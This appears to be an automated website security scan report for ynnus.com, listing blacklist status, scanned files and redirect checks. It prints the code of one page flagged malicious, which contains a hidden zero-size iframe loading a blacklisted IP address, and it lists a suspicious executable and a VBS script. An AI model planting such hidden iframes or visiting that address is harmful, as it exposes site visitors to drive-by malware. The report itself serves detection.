Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ynnus.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ynnus.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ynnus.com/ | 200 OK Content-Length: 487 Content-Type: text/html | clean |
http://ynnus.com/.ftpquota | 403 Forbidden Content-Length: 18200 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: text/javascript | clean |
http://ynnus.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://ynnus.com/cgi-bin/ | 403 Forbidden Content-Length: 18200 Content-Type: text/html | clean |
http://ynnus.com/dawn/ | 200 OK Content-Length: 426 Content-Type: text/html | clean |
http://ynnus.com/dawn/en_office_professional_plus_2010_x86_515486.exe | 200 OK Content-Length: 302406 Content-Type: application/x-msdownload | clean |
http://ynnus.com/dawn/key.txt | 200 OK Content-Length: 29 Content-Type: text/plain | clean |
http://ynnus.com/hotels/ | 200 OK Content-Length: 386 Content-Type: text/html | clean |
http://ynnus.com/hotels/ieFlights_Refresh.vbs | 200 OK Content-Length: 380 Content-Type: text/plain | clean |
http://ynnus.com/hotels/nothing.cur | 200 OK Content-Length: 766 Content-Type: text/plain | clean |
http://ynnus.com/jas/ | 200 OK Content-Length: 718 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 217.12.221.52 <html> <head> <script type="text/javascript" src="http://sunnyle.com/js/flowplayer-3.2.2.min.js"></script> <link rel="stylesheet" type="text/css" href="/includes/style.css"/> <title>Kill Sunny Vol. 2</title> </head> <body bgcolor=00000000><iframe src="http://217.12.221.52/892T?referrer=all.com" width="0" height="0" align="none"></iframe> <div id="page" align=center> <h1><font face="arial bold" color="white">Kill Sunny Vol. 2</font></h1> <a href="http://ynnus.com/jas/killsunny2.flv" style="display:block;width:640px;height:480px" id="player"> </a> <script> flowplayer(" ...[146 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://217.12.221.52/892t?referrer=all.com This URL is marked by Google as suspicious <iframe src="http://217.12.221.52/892t?referrer=all.com" width="0" height="0" align="none"> | ||
http://sunnyle.com/js/flowplayer-3.2.2.min.js | 200 OK Content-Length: 15426 Content-Type: application/javascript | clean |
http://ynnus.com/jas/killsunny2.flv | 200 OK Content-Length: 302420 Content-Type: video/x-flv | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ynnus.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 16:28:13 GMT
Server: Apache
Content-Length: 487
Content-Type: text/html;charset=ISO-8859-1
...487 bytes of data.
GET / HTTP/1.1
Host: ynnus.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Feb 2015 16:28:13 GMT
Server: Apache
Content-Length: 487
Content-Type: text/html;charset=ISO-8859-1
...487 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ynnus.com
Referer: http://www.google.com/search?q=ynnus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ynnus.com
Referer: http://www.google.com/search?q=ynnus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.